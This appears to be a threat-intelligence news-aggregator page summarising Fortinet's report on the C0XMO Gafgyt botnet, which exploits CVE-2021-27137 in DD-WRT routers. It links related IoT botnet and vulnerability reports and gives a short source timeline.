C0XMO Gafgyt botnet activity on DD-WRT routers
Malware Activity
Summary
Hide ▲
Show ▼
The C0XMO botnet is spreading through DD-WRT router firmware and other internet-facing devices, increasing the pool of systems available for DDoS attacks. It exploits CVE-2021-27137 for unauthenticated code execution, then brute-forces SSH and Telnet credentials to expand. The malware can persist with cron jobs and shell startup changes, detect CPU architecture, deploy a matching binary, and remove rival botnet clients. Its support for 19 DDoS methods makes each infected device useful for both propagation and attack traffic.
Related Happenings
DD-WRT router firmware buffer overflow remote code execution flaw (CVE-2021-27137)
Vulnerability
First: 07.06.2026 17:17
Last: 07.06.2026 17:17
Sources 1
How related:
According to the researchers, the C0XMO botnet malware is delivered by exploiting CVE-2021-27137, a buffer overflow vulnerability caused by insufficient user input. It can be leveraged without authentication and leads to executing arbitrary code.
About this happening:
**DD-WRT router firmware** is affected by **CVE-2021-27137**, a **buffer overflow** now being used by **C0XMO** to deliver malware and enable **unauthenticated remote code executi...
DD-WRT router firmware buffer overflow remote code execution flaw (CVE-2021-27137)
VulnerabilityHow related: According to the researchers, the C0XMO botnet malware is delivered by exploiting CVE-2021-27137, a buffer overflow vulnerability caused by insufficient user input. It can be leveraged without authentication and leads to executing arbitrary code.
About this happening: **DD-WRT router firmware** is affected by **CVE-2021-27137**, a **buffer overflow** now being used by **C0XMO** to deliver malware and enable **unauthenticated remote code executi...
TBK DVR command injection flaw actively exploited (CVE-2024-3721)
Vulnerability
First: 20.04.2026 16:01
Last: 20.04.2026 16:01
Sources 1
About this happening:
The **CVE-2024-3721** command injection flaw in **TBK DVR systems** is being actively exploited to gain access and install **Nexcorium** malware. Attackers abuse **crafted request...
TBK DVR command injection flaw actively exploited (CVE-2024-3721)
VulnerabilityAbout this happening: The **CVE-2024-3721** command injection flaw in **TBK DVR systems** is being actively exploited to gain access and install **Nexcorium** malware. Attackers abuse **crafted request...
Nexcorium Mirai botnet activity on TBK DVR devices
Malware Activity
First: 18.04.2026 09:01
Last: 18.04.2026 09:01
Sources 1
About this happening:
**Nexcorium**, a **Mirai variant**, is now being deployed against **TBK DVR-4104** and **DVR-4216** devices by exploiting **CVE-2024-3721**, turning compromised IoT hardware into...
Nexcorium Mirai botnet activity on TBK DVR devices
Malware ActivityAbout this happening: **Nexcorium**, a **Mirai variant**, is now being deployed against **TBK DVR-4104** and **DVR-4216** devices by exploiting **CVE-2024-3721**, turning compromised IoT hardware into...
ShadowV2 Mirai-based IoT botnet activity
Malware Activity
First: 27.11.2025 00:24
Last: 27.11.2025 00:24
Sources 1
About this happening:
The **Mirai-based botnet ShadowV2** was observed targeting **IoT devices** from **D-Link**, **TP-Link**, and other vendors, creating **DDoS risk** across exposed systems. Research...
ShadowV2 Mirai-based IoT botnet activity
Malware ActivityAbout this happening: The **Mirai-based botnet ShadowV2** was observed targeting **IoT devices** from **D-Link**, **TP-Link**, and other vendors, creating **DDoS risk** across exposed systems. Research...
Winos 4.0 and HoldingHands RAT malware activity expanding targeting to Japan and Malaysia
Malware Activity
First: 18.10.2025 09:51
Last: 18.10.2025 09:51
Sources 1
About this happening:
The **Winos 4.0** malware operation has expanded its target footprint to **Japan** and **Malaysia** through **HoldingHands RAT**, increasing the reach of a multi-stage phishing de...
Winos 4.0 and HoldingHands RAT malware activity expanding targeting to Japan and Malaysia
Malware ActivityAbout this happening: The **Winos 4.0** malware operation has expanded its target footprint to **Japan** and **Malaysia** through **HoldingHands RAT**, increasing the reach of a multi-stage phishing de...
Timeline
-
07.06.2026 17:17 2 articles · 3h ago
Fortinet uncovers C0XMO Gafgyt botnet targeting DD-WRT router firmware
Initial DisclosureFortinet researchers uncovered C0XMO, a new Gafgyt botnet variant targeting DD-WRT router firmware and other internet-facing devices across ARM, MIPS, PowerPC, SuperH, x86, x86_64, and other architectures. The malware is delivered by exploiting CVE-2021-27137, downloads a Python scanner that installs requests, paramiko, and beautifulsoup4, brute-forces SSH and Telnet credentials, deploys a matching binary, persists through cron jobs and shell startup files, terminates competing malware and interfering tools, and awaits commands from a hardcoded C2 server to launch one of 19 DDoS methods.
Show sources
- C0XMO botnet spreads via DD-WRT router flaw, kills rival malware — www.bleepingcomputer.com — 07.06.2026 17:17
- C0XMO botnet spreads via DD-WRT router flaw, kills rival malware — www.bleepingcomputer.com — 07.06.2026 17:17